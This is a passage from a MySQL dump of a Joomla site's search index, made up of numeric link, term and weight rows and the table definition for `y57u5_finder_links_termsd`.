(245, 284737, 1.05),
(245, 284738, 0.86331),
(245, 284739, 0.93331),
(245, 284740, 1.12),
(245, 284741, 1.30669),
(245, 284742, 0.81669),
(245, 284743, 0.98),
(246, 285247, 0.88669),
(246, 285248, 0.93331),
(246, 285249, 0.86331),
(246, 285250, 1.00331),
(246, 285251, 1.23669),
(246, 285252, 0.81669),
(246, 285253, 0.93331),
(246, 285254, 0.84),
(246, 285255, 0.93331),
(246, 285256, 0.84),
(246, 285257, 0.95669),
(246, 285258, 0.84),
(246, 285259, 0.88669),
(246, 285260, 0.84),
(246, 285261, 0.88669),
(246, 285262, 0.86331),
(246, 285263, 0.95669),
(246, 285264, 0.88669),
(246, 285265, 0.95669),
(246, 285266, 0.98),
(246, 285267, 1.09669),
(246, 285268, 0.91),
(246, 285269, 0.95669),
(246, 285270, 0.93331),
(246, 285271, 1.16669),
(246, 285272, 0.86331),
(246, 285273, 0.91),
(246, 285274, 0.86331),
(246, 285275, 0.93331),
(246, 285276, 0.88669),
(246, 285277, 1.02669),
(246, 285278, 0.28),
(246, 285279, 0.88669),
(246, 285280, 1.05),
(246, 285281, 0.23331),
(246, 285282, 0.86331),
(246, 285283, 1.00331),
(246, 285284, 0.84),
(246, 285285, 1.05),
(246, 285286, 0.86331),
(246, 285287, 1.02669),
(246, 285288, 0.88669),
(246, 285289, 0.93331),
(246, 285290, 1.07331),
(246, 285291, 0.86331),
(246, 285292, 1.00331),
(246, 285293, 0.79331),
(246, 285294, 0.95669),
(246, 285295, 0.91),
(246, 285296, 1.00331),
(246, 285297, 0.81669),
(246, 285298, 0.95669),
(246, 285299, 0.35),
(246, 285300, 0.91),
(246, 285301, 1.00331),
(246, 285302, 0.88669),
(246, 285303, 0.95669),
(246, 285304, 0.86331),
(246, 285305, 1.00331),
(246, 285306, 0.37338),
(246, 285307, 1.68),
(246, 285308, 1.82),
(246, 285309, 0.28),
(246, 285310, 0.88669),
(246, 285311, 1.00331),
(246, 285346, 0.84),
(246, 285347, 0.88669),
(246, 285348, 0.81669),
(246, 285349, 0.88669),
(246, 285350, 0.79331),
(246, 285351, 0.88669),
(246, 285352, 0.86331),
(246, 285353, 0.95669),
(247, 286270, 0.86331),
(247, 286271, 0.98),
(247, 286272, 0.91),
(247, 286273, 0.79331),
(247, 286274, 0.93331),
(247, 286275, 0.28),
(247, 286276, 0.95669),
(247, 286277, 1.00331),
(247, 286278, 0.81669),
(247, 286279, 0.88669),
(247, 286280, 0.86331),
(247, 286281, 0.91),
(247, 286282, 0.86331),
(247, 286283, 0.93331),
(247, 286284, 0.93331),
(247, 286285, 1.07331),
(247, 286286, 0.35),
(247, 286287, 0.95669),
(247, 286288, 1.00331),
(247, 286289, 0.35),
(247, 286290, 0.93331),
(247, 286291, 1.02669),
(247, 286292, 0.81669),
(247, 286293, 1.00331),
(247, 286294, 0.93331),
(247, 286295, 1.07331),
(247, 286296, 0.35),
(247, 286297, 0.95669),
(247, 286298, 1.02669),
(247, 286299, 1.58662),
(247, 286300, 0.88669),
(247, 286301, 0.95669),
(247, 286302, 0.84),
(247, 286303, 0.93331),
(247, 286304, 0.35),
(247, 286305, 0.93331),
(247, 286306, 1.00331),
(247, 286307, 0.91),
(247, 286308, 1.00331),
(247, 286309, 0.35),
(247, 286310, 0.98),
(247, 286311, 1.07331),
(247, 286312, 0.93331),
(247, 286313, 0.98),
(247, 286314, 0.32669),
(247, 286315, 1.00331),
(247, 286316, 1.14331),
(247, 286317, 0.93331),
(247, 286318, 1.05),
(247, 286319, 0.88669),
(247, 286320, 0.98),
(247, 286321, 0.60669),
(247, 286322, 1.16669),
(247, 286323, 1.30669),
(247, 286324, 0.32669),
(247, 286325, 0.91),
(247, 286326, 1.02669),
(247, 286327, 0.98),
(247, 286328, 0.88669),
(247, 286329, 0.84),
(247, 286330, 0.98),
(247, 286331, 0.81669),
(247, 286332, 0.91),
(247, 286333, 0.79331),
(247, 286334, 0.93331),
(247, 286335, 0.88669),
(247, 286336, 0.95669),
(247, 286337, 0.86331),
(247, 286338, 0.98),
(247, 286339, 0.7),
(247, 286340, 1.02669),
(247, 286341, 1.09669),
(247, 286342, 0.95669),
(247, 286343, 1.02669),
(247, 286344, 0.84),
(247, 286345, 0.88669),
(247, 286346, 0.35),
(247, 286347, 0.88669),
(247, 286348, 0.95669),
(247, 286349, 0.81669),
(247, 286350, 0.91),
(247, 286351, 1.58662),
(247, 286352, 0.84),
(247, 286353, 0.88669),
(247, 286354, 0.93331),
(247, 286355, 0.98),
(247, 286356, 0.28),
(247, 286357, 0.91),
(247, 286358, 1.02669),
(247, 286359, 0.28),
(247, 286360, 0.88669),
(247, 286361, 0.98),
(247, 286362, 0.28),
(247, 286363, 0.88669),
(247, 286364, 1.02669),
(247, 286408, 0.86331),
(247, 286409, 1.02669),
(247, 286410, 0.28),
(247, 286411, 0.93331),
(247, 286412, 1.00331),
(248, 287293, 0.86331),
(248, 287294, 1.00331),
(248, 287295, 0.28),
(248, 287296, 0.91),
(248, 287297, 1.07331),
(248, 287298, 0.88669),
(248, 287299, 1.05),
(248, 287300, 0.28),
(248, 287301, 0.86331),
(248, 287302, 1.00331),
(248, 287303, 0.86331),
(248, 287304, 0.91),
(248, 287305, 0.79331),
(248, 287306, 0.95669),
(248, 287307, 0.88669),
(248, 287308, 1.00331),
(248, 287309, 0.35),
(248, 287310, 0.95669),
(248, 287311, 1.02669),
(248, 287312, 0.93331),
(248, 287313, 1.12),
(248, 287314, 0.28),
(248, 287315, 0.95669),
(248, 287316, 1.02669),
(248, 287317, 0.84),
(248, 287318, 0.88669),
(248, 287319, 0.32669),
(248, 287320, 0.95669),
(248, 287321, 1.12),
(248, 287322, 0.88669),
(248, 287323, 0.79331),
(248, 287324, 0.84),
(249, 288316, 2.32339),
(249, 288317, 1.02669),
(249, 288318, 1.12),
(249, 288319, 2.26661),
(249, 288320, 2.38),
(249, 288321, 0.68),
(249, 288322, 2.04),
(249, 288323, 2.32339),
(249, 288324, 0.21),
(249, 288325, 0.93331),
(249, 288326, 1.02669),
(249, 288327, 0.85),
(249, 288328, 2.32339),
(249, 288329, 2.55),
(249, 288330, 0.35),
(249, 288331, 0.88669),
(249, 288332, 1.05),
(249, 288333, 0.86331),
(249, 288334, 0.98),
(249, 288335, 0.88669),
(249, 288336, 1.00331),
(249, 288337, 0.32669),
(249, 288338, 0.91),
(249, 288339, 1.05),
(249, 288340, 0.86331),
(249, 288341, 0.95669),
(249, 288342, 0.88669),
(249, 288343, 0.98),
(249, 288344, 2.21),
(249, 288345, 2.55),
(249, 288346, 0.86331),
(249, 288347, 1.00331),
(249, 288348, 0.35),
(249, 288349, 0.35),
(249, 288350, 0.91),
(249, 288351, 1.05),
(251, 289402, 0.21),
(251, 289403, 0.93331),
(251, 289404, 1.02669),
(253, 290554, 2.4),
(253, 290555, 2.7334),
(253, 290556, 0.84),
(253, 290557, 0.91),
(253, 290558, 0.95669),
(253, 290559, 0.86331),
(253, 290560, 0.91),
(253, 290561, 0.79331),
(253, 290562, 0.88669),
(253, 290563, 0.79331),
(253, 290564, 0.91),
(253, 290565, 0.84),
(253, 290566, 0.88669),
(254, 291575, 4.9332),
(254, 291576, 1.14),
(292, 291576, 1.14),
(304, 291576, 1.14),
(305, 291576, 1.14),
(254, 291577, 6.65019),
(254, 291578, 5.3332),
(254, 291579, 2.26661),
(254, 291580, 0.84),
(254, 291581, 0.91),
(254, 291582, 2.6),
(254, 291583, 2.7334),
(254, 291584, 0.88669),
(254, 291585, 0.98),
(254, 291586, 1.6),
(254, 291587, 0.88669),
(254, 291588, 0.98),
(254, 291589, 0.93331),
(254, 291590, 1.02669),
(254, 291591, 0.93331),
(254, 291592, 1.02669),
(254, 291593, 0.91),
(254, 291594, 1.02669),
(255, 292598, 0.98),
(255, 292599, 1.07331),
(255, 292600, 0.86331),
(288, 292600, 0.86331),
(255, 292601, 0.93331),
(255, 292602, 0.86331),
(290, 292602, 0.86331),
(255, 292603, 0.98),
(255, 292604, 2.4666),
(255, 292605, 2.7334),
(255, 292606, 0.86331),
(255, 292607, 0.98),
(255, 292608, 0.88669),
(255, 292609, 1.02669),
(255, 292610, 1.98339),
(255, 292611, 2.26661),
(256, 293109, 2.6666),
(256, 293110, 3.0666),
(256, 293111, 0.86331),
(256, 293112, 1.00331),
(256, 293113, 0.88669),
(256, 293114, 1.07331),
(256, 293115, 0.91),
(256, 293116, 1.02669),
(256, 293117, 0.93331),
(256, 293118, 1.02669),
(256, 293119, 0.28),
(256, 293120, 1.02669),
(256, 293121, 1.14331),
(256, 293122, 6.65019),
(256, 293123, 7.59981),
(256, 293126, 0.14),
(256, 293127, 0.86331),
(256, 293128, 1.05),
(257, 294132, 6.65019),
(257, 294133, 7.59981),
(257, 294134, 0.86331),
(257, 294135, 0.93331),
(257, 294136, 2.4666),
(257, 294137, 2.7334),
(258, 295155, 0.84),
(258, 295156, 0.95669),
(258, 295157, 6.65019),
(258, 295158, 7.59981),
(258, 295159, 1.72662),
(258, 295160, 1.05),
(258, 295161, 1.00331),
(258, 295162, 0.91),
(258, 295163, 0.98),
(258, 295164, 0.86331),
(258, 295165, 0.95669),
(258, 295166, 2.4666),
(258, 295167, 2.7334),
(258, 295177, 0.88669),
(258, 295178, 1.02669),
(259, 296178, 6.65019),
(259, 296179, 7.59981),
(259, 296180, 2.4666),
(259, 296181, 2.7334),
(260, 296209, 6.65019),
(260, 296210, 7.59981),
(260, 296211, 2.4666),
(260, 296212, 2.7334),
(261, 296240, 6.65019),
(261, 296241, 7.59981),
(262, 297266, 0.84),
(262, 297267, 0.91),
(262, 297268, 0.84),
(262, 297269, 0.98),
(262, 297270, 0.81669),
(262, 297271, 0.91),
(262, 297272, 1.00331),
(262, 297273, 0.86331),
(262, 297274, 1.02669),
(262, 297275, 1.63338),
(262, 297276, 0.88669),
(262, 297277, 0.93331),
(262, 297278, 0.84),
(304, 297278, 0.84),
(262, 297279, 0.95669),
(262, 297280, 6.65019),
(262, 297281, 7.59981),
(262, 297282, 0.86331),
(262, 297283, 0.98),
(262, 297284, 0.14),
(262, 297285, 0.91),
(262, 297286, 1.19),
(263, 299310, 0.84),
(263, 299311, 0.93331),
(263, 299312, 0.35),
(263, 299313, 0.95669),
(263, 299314, 1.05),
(263, 299315, 0.84),
(263, 299316, 0.98),
(263, 299317, 0.88669),
(263, 299318, 1.02669),
(263, 299319, 0.79331),
(263, 299320, 0.91),
(263, 299321, 1.00331),
(263, 299322, 0.88669),
(263, 299323, 1.21331),
(263, 299324, 0.81669),
(263, 299325, 0.88669),
(263, 299326, 1.63338),
(263, 299327, 0.88669),
(263, 299328, 0.88669),
(263, 299329, 0.95669),
(263, 299330, 1.02669),
(263, 299331, 0.93331),
(263, 299332, 1.02669),
(263, 299333, 6.65019),
(263, 299334, 7.59981),
(263, 299344, 0.77),
(263, 299345, 0.81669),
(263, 299346, 0.81669),
(263, 299347, 0.93331),
(263, 299348, 0.14),
(263, 299349, 0.86331),
(263, 299350, 0.93331),
(264, 300335, 0.79331),
(264, 300336, 0.91),
(264, 300337, 0.79331),
(264, 300338, 0.88669),
(264, 300339, 0.81669),
(264, 300340, 0.91),
(264, 300341, 0.86331),
(264, 300342, 0.95669),
(264, 300343, 0.84),
(264, 300344, 0.88669),
(264, 300345, 0.79331),
(264, 300346, 0.91),
(264, 300347, 0.84),
(264, 300348, 0.86331),
(264, 300349, 0.81669),
(264, 300350, 0.86331),
(264, 300351, 0.84),
(264, 300352, 0.93331),
(264, 300353, 1.12),
(267, 300858, 0.77),
(267, 300859, 0.86331),
(267, 300860, 0.84),
(267, 300861, 1.07331),
(267, 300862, 0.88669),
(267, 300863, 6.65019),
(267, 300864, 7.59981),
(267, 300865, 0.81669),
(267, 300866, 0.91),
(267, 300867, 0.91),
(267, 300868, 0.81669),
(267, 300869, 0.91),
(267, 300870, 0.84),
(267, 300871, 1.05),
(268, 301881, 6.65019),
(268, 301882, 7.59981),
(268, 301883, 0.81669),
(268, 301884, 0.88669),
(268, 301885, 1.00331),
(268, 301886, 1.05),
(268, 301887, 0.86331),
(268, 301888, 0.93331),
(268, 301889, 0.81669),
(268, 301890, 1.07331),
(268, 301891, 0.88669),
(268, 301892, 0.95669),
(269, 302904, 0.77),
(269, 302905, 0.81669),
(269, 302906, 0.28),
(269, 302907, 0.95669),
(269, 302908, 1.07331),
(269, 302909, 0.95669),
(272, 303941, 6.65019),
(272, 303942, 7.59981),
(274, 303975, 0.84),
(274, 303976, 0.93331),
(274, 303977, 6.65019),
(274, 303978, 7.59981),
(275, 304998, 0.84),
(275, 304999, 0.95669),
(275, 305000, 6.65019),
(275, 305001, 7.59981),
(280, 307582, 6.65019),
(280, 307583, 7.59981),
(287, 312727, 0.86331),
(287, 312728, 1.00331),
(287, 312729, 0.93331),
(287, 312730, 1.12),
(287, 312731, 0.98),
(287, 312732, 1.05),
(287, 312733, 0.88669),
(287, 312734, 1.14331),
(287, 312735, 0.86331),
(287, 312736, 0.98),
(287, 312737, 0.86331),
(287, 312738, 0.93331),
(287, 312739, 0.86331),
(287, 312740, 1.05),
(287, 312741, 0.88669),
(287, 312742, 1.00331),
(287, 312743, 0.93331),
(287, 312744, 1.00331),
(287, 312745, 0.86331),
(287, 312746, 0.81669),
(287, 312747, 0.91),
(287, 312765, 0.86331),
(305, 312765, 0.86331),
(287, 312766, 0.98),
(288, 313238, 0.34),
(290, 313238, 1.14),
(288, 313239, 2.09661),
(290, 313239, 7.02981),
(288, 313240, 0.93331),
(288, 313241, 1.98339),
(288, 313242, 2.26661),
(290, 315284, 6.65019),
(290, 315285, 7.59981),
(290, 315286, 1.02669),
(290, 315287, 0.81669),
(290, 315288, 0.88669),
(290, 315289, 0.95669),
(292, 317332, 7.02981),
(292, 317333, 6.65019),
(292, 317334, 7.59981),
(292, 317335, 0.35),
(292, 317336, 0.95669),
(292, 317337, 1.09669),
(292, 317338, 0.84),
(292, 317339, 1.00331),
(292, 317340, 1.00331),
(292, 317341, 1.14331),
(292, 317348, 0.84),
(292, 317349, 0.95669),
(294, 318417, 0.84),
(294, 318418, 0.91),
(294, 318419, 0.81669),
(294, 318420, 0.98),
(294, 318421, 0.84),
(294, 318422, 0.91),
(295, 318475, 0.7),
(295, 318476, 1.07331),
(295, 318477, 1.26),
(295, 318478, 0.56),
(295, 318479, 0.98),
(295, 318480, 1.16669),
(295, 318481, 0.98),
(295, 318482, 1.07331),
(295, 318483, 0.14),
(295, 318484, 0.91),
(295, 318485, 1.02669),
(304, 318486, 2.28),
(305, 318486, 2.28),
(295, 318486, 3.12),
(295, 318487, 8.74688),
(295, 318488, 10.24),
(295, 318489, 0.98),
(295, 318490, 1.23669),
(295, 318491, 0.93331),
(295, 318492, 1.05),
(295, 318493, 0.28),
(295, 318494, 0.88669),
(295, 318495, 0.98),
(295, 318496, 0.28),
(295, 318497, 0.91),
(295, 318498, 1.00331),
(295, 318499, 0.7),
(295, 318500, 1.07331),
(295, 318501, 1.26),
(295, 318502, 0.18669),
(295, 318503, 0.93331),
(295, 318504, 1.02669),
(295, 318505, 0.14),
(295, 318506, 0.91),
(295, 318507, 1.09669),
(295, 318530, 0.42),
(295, 318531, 0.86331),
(295, 318532, 0.98),
(295, 318533, 0.86331),
(295, 318534, 0.98),
(295, 318535, 0.21),
(295, 318536, 0.88669),
(295, 318537, 1.00331),
(295, 318538, 0.42),
(295, 318539, 1.86662),
(295, 318540, 1.07331),
(295, 318541, 1.07331),
(295, 318542, 0.86331),
(295, 318543, 1.00331),
(295, 318544, 0.46669),
(295, 318545, 1.02669),
(295, 318546, 1.26),
(298, 320001, 2.9334),
(299, 320518, 0.98),
(299, 320519, 0.86331),
(299, 320520, 0.86331),
(299, 320521, 0.86331),
(299, 320522, 1.00331),
(299, 320523, 0.93331),
(299, 320524, 1.12),
(299, 320525, 1.09669),
(299, 320526, 0.86331),
(299, 320527, 1.02669),
(299, 320528, 0.81669),
(299, 320529, 0.95669),
(299, 320530, 0.93331),
(299, 320531, 1.02669),
(299, 320532, 0.84),
(299, 320533, 0.95669),
(299, 320553, 2.3334),
(299, 320554, 2.5334),
(304, 323767, 7.02981),
(305, 323767, 7.02981),
(304, 324786, 0.93331),
(304, 324787, 0.98),
(304, 324788, 0.79331),
(304, 324789, 1.07331),
(304, 324790, 0.95669),
(304, 324791, 1.14331),
(304, 324792, 0.88669),
(304, 324793, 0.95669),
(304, 324794, 0.91),
(304, 324795, 1.00331),
(304, 324796, 0.95669),
(304, 324797, 0.81669),
(304, 324798, 1.09669),
(304, 324799, 6.65019),
(304, 324800, 7.59981),
(304, 324801, 0.81669),
(304, 324802, 0.98),
(304, 324820, 0.86331),
(304, 324821, 1.07331),
(305, 325811, 4.6668),
(305, 325812, 5.3332),
(305, 325813, 0.86331),
(305, 325814, 1.02669),
(305, 325815, 0.81669),
(305, 325816, 0.88669),
(305, 325817, 0.81669),
(305, 325818, 0.91),
(305, 325819, 0.35),
(305, 325820, 0.88669),
(305, 325821, 0.98),
(305, 325822, 0.88669),
(305, 325823, 0.95669),
(305, 325824, 1.98339),
(305, 325825, 2.26661),
(305, 325826, 0.86331),
(305, 325827, 1.02669),
(305, 325847, 0.98),
(306, 326801, 0.49),
(306, 326802, 0.93331),
(306, 326803, 1.02669),
(306, 326804, 0.84),
(306, 326805, 0.93331);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_finder_links_termsd`
--

CREATE TABLE `y57u5_finder_links_termsd` (
  `link_id` int(10) UNSIGNED NOT NULL,
  `term_id` int(10) UNSIGNED NOT NULL,
  `weight` float UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;

--
-- Dumping data for table `y57u5_finder_links_termsd`
--

INSERT INTO `y57u5_finder_links_termsd` (`link_id`, `term_id`, `weight`) VALUES
(31, 1, 0),
(159, 1, 0),
(160, 1, 0),
(161, 1, 0),
(168, 1, 0),
(174, 1, 0),
(178, 1, 0),
(193, 1, 0),
(233, 1, 0),
(235, 1, 0),
(236, 1, 0),
(237, 1, 0),
(238, 1, 0),
(239, 1, 0),
(240, 1, 0),
(241, 1, 0),
(242, 1, 0),
(243, 1, 0),
(244, 1, 0),
(245, 1, 0),
(246, 1, 0),
(247, 1, 0),
(248, 1, 0),
(249, 1, 0),
(250, 1, 0),
(251, 1, 0),
(252, 1, 0),
(253, 1, 0),
(254, 1, 0),
(255, 1, 0),
(256, 1, 0),
(257, 1, 0),
(258, 1, 0),
(259, 1, 0),
(260, 1, 0),
(261, 1, 0),
(262, 1, 0),
(263, 1, 0),
(264, 1, 0),
(265, 1, 0),
(266, 1, 0),
(267, 1, 0),
(268, 1, 0),
(269, 1, 0),
(270, 1, 0),
(272, 1, 0),
(273, 1, 0),
(274, 1, 0),
(275, 1, 0),
(280, 1, 0),
(287, 1, 0),
(288, 1, 0),
(290, 1, 0),
(292, 1, 0),
(294, 1, 0),
(295, 1, 0),
(298, 1, 0),
(299, 1, 0),
(301, 1, 0),
(304, 1, 0),
(305, 1, 0),
(295, 357, 0.04676),
(301, 357, 0.14028),
(44, 357, 0.18662),
(298, 357, 0.18704),
(304, 357, 0.22211),
(45, 357, 0.22661),
(49, 357, 0.22661),
(305, 357, 0.25718),
(299, 357, 0.31563),
(246, 357, 0.37324),
(265, 357, 0.37324),
(266, 357, 0.37324),
(287, 357, 0.37324),
(255, 357, 0.46655),
(161, 357, 0.50654),
(31, 357, 0.55986),
(249, 357, 0.55986),
(250, 357, 0.55986),
(251, 357, 0.55986),
(264, 357, 0.55986),
(269, 357, 0.55986),
(261, 357, 0.65317),
(159, 357, 0.74648),
(160, 357, 0.74648),
(237, 357, 0.83979),
(233, 357, 1.02641),
(247, 357, 1.02641),
(252, 357, 1.02641),
(267, 357, 1.02641),
(268, 357, 1.02641),
(273, 357, 1.02641),
(280, 357, 1.02641),
(168, 357, 1.11972),
(256, 357, 1.11972),
(270, 357, 1.11972),
(290, 357, 1.11972),
(241, 357, 1.21303),
(272, 357, 1.21303),
(245, 357, 1.22636),
(253, 357, 1.30634),
(174, 357, 1.39965),
(259, 357, 1.39965),
(260, 357, 1.39965),
(263, 357, 1.39965),
(292, 357, 1.49296),
(308, 357, 1.49296),
(288, 357, 1.58627),
(257, 357, 1.67958),
(262, 357, 1.67958),
(248, 357, 1.69291),
(244, 357, 1.90619),
(274, 357, 1.95951),
(275, 357, 1.97284),
(238, 357, 2.05282),
(178, 357, 2.23944),
(240, 357, 2.27943),
(235, 357, 2.34608),
(236, 357, 2.42606),
(258, 357, 2.51937),
(239, 357, 2.55936),
(254, 357, 2.61268),
(243, 357, 2.89261),
(306, 357, 2.89261),
(193, 357, 2.98592),
(242, 357, 4.23894),
(31, 358, 1.63338),
(159, 358, 1.63338),
(160, 358, 1.63338),
(250, 358, 1.63338),
(251, 358, 1.63338),
(31, 359, 0.95669),
(159, 359, 0.95669),
(160, 359, 0.95669),
(250, 359, 0.95669),
(251, 359, 0.95669),
(31, 360, 0.93331),
(159, 360, 0.93331),
(160, 360, 0.93331),
(250, 360, 0.93331),
(251, 360, 0.93331),
(31, 361, 0.98),
(159, 361, 0.98),
(160, 361, 0.98),
(242, 361, 0.98),
(250, 361, 0.98),
(251, 361, 0.98),
(31, 362, 1.05),
(159, 362, 1.05),
(160, 362, 1.05),
(250, 362, 1.05),
(251, 362, 1.05),
(31, 363, 0.86331),
(159, 363, 0.86331),
(160, 363, 0.86331),
(250, 363, 0.86331),
(251, 363, 0.86331),
(256, 363, 0.86331),
(258, 363, 0.86331),
(270, 363, 0.86331),
(274, 363, 0.86331),
(275, 363, 0.86331),
(301, 363, 0.86331),
(31, 364, 0.98),
(159, 364, 0.98),
(160, 364, 0.98),
(250, 364, 0.98),
(251, 364, 0.98),
(31, 365, 0.84),
(168, 365, 0.84),
(249, 365, 0.84),
(250, 365, 0.84),
(251, 365, 0.84),
(253, 365, 0.84),
(256, 365, 0.84),
(262, 365, 0.84),
(270, 365, 0.84),
(287, 365, 0.84),
(301, 365, 0.84),
(159, 365, 1.68),
(160, 365, 1.68),
(193, 365, 1.68),
(236, 365, 1.68),
(243, 365, 1.68),
(247, 365, 1.68),
(248, 365, 1.68),
(254, 365, 1.68),
(259, 365, 1.68),
(260, 365, 1.68),
(264, 365, 1.68),
(274, 365, 1.68),
(49, 365, 2.04),
(174, 365, 2.52),
(233, 365, 2.52),
(252, 365, 2.52),
(268, 365, 2.52),
(269, 365, 2.52),
(290, 365, 2.52),
(292, 365, 2.52),
(237, 365, 3.36),
(238, 365, 3.36),
(241, 365, 3.36),
(244, 365, 3.36),
(178, 365, 4.2),
(235, 365, 4.2),
(242, 365, 4.2),
(257, 365, 4.2),
(288, 365, 4.2),
(299, 365, 4.2),
(267, 365, 5.04),
(273, 365, 5.04),
(240, 365, 5.88),
(298, 365, 5.88),
(308, 365, 5.88),
(304, 365, 6.72),
(306, 365, 6.72),
(305, 365, 7.56),
(275, 365, 8.52),
(239, 365, 9.24),
(258, 365, 11.76),
(31, 366, 1.02669),
(159, 366, 1.02669),
(160, 366, 1.02669),
(250, 366, 1.02669),
(251, 366, 1.02669),
(31, 367, 0.86331),
(174, 367, 0.86331),
(241, 367, 0.86331),
(243, 367, 0.86331),
(244, 367, 0.86331),
(247, 367, 0.86331),
(250, 367, 0.86331),
(251, 367, 0.86331),
(253, 367, 0.86331),
(254, 367, 0.86331),
(256, 367, 0.86331),
(258, 367, 0.86331),
(263, 367, 0.86331),
(299, 367, 0.86331),
(305, 367, 0.86331),
(159, 367, 1.72662),
(160, 367, 1.72662),
(238, 367, 1.72662),
(257, 367, 1.72662),
(261, 367, 1.72662),
(272, 367, 1.72662),
(275, 367, 1.72662),
(280, 367, 1.72662),
(242, 367, 2.58993),
(270, 367, 3.45324),
(301, 367, 3.45324),
(259, 367, 5.17986),
(260, 367, 5.17986),
(262, 367, 6.90648),
(193, 367, 9.49641),
(31, 368, 0.98),
(159, 368, 0.98),
(160, 368, 0.98),
(250, 368, 0.98),
(251, 368, 0.98),
(295, 369, 0.01169),
(298, 369, 0.01169),
(304, 369, 0.01169),
(299, 369, 0.08183),
(31, 369, 0.09331),
(161, 369, 0.09331),
(174, 369, 0.09331),
(178, 369, 0.09331),
(235, 369, 0.09331),
(243, 369, 0.09331),
(246, 369, 0.09331),
(248, 369, 0.09331),
(250, 369, 0.09331),
(251, 369, 0.09331),
(253, 369, 0.09331),
(254, 369, 0.09331),
(255, 369, 0.09331),
(259, 369, 0.09331),
(260, 369, 0.09331),
(261, 369, 0.09331),
(263, 369, 0.09331),
(264, 369, 0.09331),
(265, 369, 0.09331),
(266, 369, 0.09331),
(267, 369, 0.09331),
(308, 369, 0.09331),
(159, 369, 0.18662),
(160, 369, 0.18662),
(233, 369, 0.18662),
(238, 369, 0.18662),
(244, 369, 0.18662),
(249, 369, 0.18662),
(258, 369, 0.18662),
(272, 369, 0.18662),
(275, 369, 0.18662),
(280, 369, 0.18662),
(292, 369, 0.18662),
(168, 369, 0.27993),
(193, 369, 0.27993),
(236, 369, 0.27993),
(237, 369, 0.27993),
(242, 369, 0.27993),
(247, 369, 0.27993),
(268, 369, 0.27993),
(273, 369, 0.27993),
(269, 369, 0.37324),
(274, 369, 0.37324),
(239, 369, 0.55986),
(306, 369, 0.55986),
(262, 369, 0.65317),
(240, 369, 0.9331),
(31, 370, 0.86331),
(159, 370, 0.86331),
(160, 370, 0.86331),
(250, 370, 0.86331),
(251, 370, 0.86331),
(31, 371, 0.98),
(159, 371, 0.98),
(160, 371, 0.98),
(250, 371, 0.98),
(251, 371, 0.98),
(233, 372, 0.14),
(235, 372, 0.14),
(238, 372, 0.14),
(241, 372, 0.14),
(242, 372, 0.14),
(244, 372, 0.14),
(252, 372, 0.14),
(253, 372, 0.14),
(257, 372, 0.14),
(258, 372, 0.14),
(259, 372, 0.14),
(260, 372, 0.14),
(275, 372, 0.14),
(290, 372, 0.14),
(298, 372, 0.14),
(304, 372, 0.14),
(305, 372, 0.14),
(308, 372, 0.14),
(174, 372, 0.28),
(178, 372, 0.28),
(193, 372, 0.28),
(236, 372, 0.28),
(240, 372, 0.28),
(245, 372, 0.28),
(268, 372, 0.28),
(287, 372, 0.28),
(288, 372, 0.28),
(239, 372, 0.42),
(269, 372, 0.42),
(292, 372, 0.42),
(31, 372, 0.56),
(159, 372, 0.56),
(160, 372, 0.56),
(250, 372, 0.56),
(251, 372, 0.56),
(267, 372, 0.56),
(299, 372, 0.7),
(306, 372, 0.7),
(246, 372, 1.26),
(31, 373, 1.77338),
(159, 373, 1.77338),
(160, 373, 1.77338),
(250, 373, 1.77338),
(251, 373, 1.77338),
(31, 374, 1.00331),
(159, 374, 1.00331),
(160, 374, 1.00331),
(250, 374, 1.00331),
(251, 374, 1.00331),
(31, 375, 1.00331),
(159, 375, 1.00331),
(160, 375, 1.00331),
(250, 375, 1.00331),
(251, 375, 1.00331),
(31, 376, 0.88669),
(159, 376, 0.88669),
(160, 376, 0.88669),
(250, 376, 0.88669),
(251, 376, 0.88669),
(31, 377, 1.05),
(159, 377, 1.05),
(160, 377, 1.05),
(250, 377, 1.05),
(251, 377, 1.05),
(31, 378, 0.88669),
(159, 378, 0.88669),
(160, 378, 0.88669),
(178, 378, 0.88669),
(233, 378, 0.88669),
(238, 378, 0.88669),
(250, 378, 0.88669),
(251, 378, 0.88669),
(31, 379, 0.95669),
(159, 379, 0.95669),
(160, 379, 0.95669),
(233, 379, 0.95669),
(250, 379, 0.95669),
(251, 379, 0.95669),
(31, 380, 0.18669),
(159, 380, 0.18669),
(160, 380, 0.18669),
(240, 380, 0.18669),
(250, 380, 0.18669),
(251, 380, 0.18669),
(272, 380, 0.37338),
(280, 380, 0.37338),
(31, 381, 0.93331),
(159, 381, 0.93331),
(160, 381, 0.93331),
(250, 381, 0.93331),
(251, 381, 0.93331),
(31, 382, 1.05),
(159, 382, 1.05),
(160, 382, 1.05),
(250, 382, 1.05),
(251, 382, 1.05),
(298, 383, 0.01169),
(299, 383, 0.02338),
(301, 383, 0.02338),
(304, 383, 0.02338),
(305, 383, 0.08183),
(159, 383, 0.09331),
(178, 383, 0.09331),
(237, 383, 0.09331),
(238, 383, 0.09331),
(247, 383, 0.09331),
(254, 383, 0.09331),
(256, 383, 0.09331),
(258, 383, 0.09331),
(262, 383, 0.09331),
(265, 383, 0.09331),
(266, 383, 0.09331),
(269, 383, 0.09331),
(273, 383, 0.09331),
(290, 383, 0.09331),
(308, 383, 0.09331),
(31, 383, 0.18662),
(160, 383, 0.18662),
(161, 383, 0.18662),
(243, 383, 0.18662),
(244, 383, 0.18662),
(250, 383, 0.18662),
(251, 383, 0.18662),
(261, 383, 0.18662),
(263, 383, 0.18662),
(264, 383, 0.18662),
(270, 383, 0.18662),
(272, 383, 0.18662),
(274, 383, 0.18662),
(280, 383, 0.18662),
(236, 383, 0.27993),
(240, 383, 0.27993),
(253, 383, 0.27993),
(267, 383, 0.27993),
(275, 383, 0.27993),
(288, 383, 0.27993),
(193, 383, 0.37324),
(239, 383, 0.37324),
(248, 383, 0.37324),
(257, 383, 0.37324),
(268, 383, 0.37324),
(306, 383, 0.37324),
(174, 383, 0.46655),
(235, 383, 0.46655),
(242, 383, 0.46655),
(245, 383, 1.5996),
(31, 384, 0.88669),
(160, 384, 0.88669),
(250, 384, 0.88669),
(251, 384, 0.88669),
(31, 385, 1.14331),
(160, 385, 1.14331),
(250, 385, 1.14331),
(251, 385, 1.14331),
(31, 386, 0.86331),
(159, 386, 0.86331),
(160, 386, 0.86331),
(250, 386, 0.86331),
(251, 386, 0.86331),
(31, 387, 1.00331),
(159, 387, 1.00331),
(160, 387, 1.00331),
(250, 387, 1.00331),
(251, 387, 1.00331),
(299, 388, 0.02919),
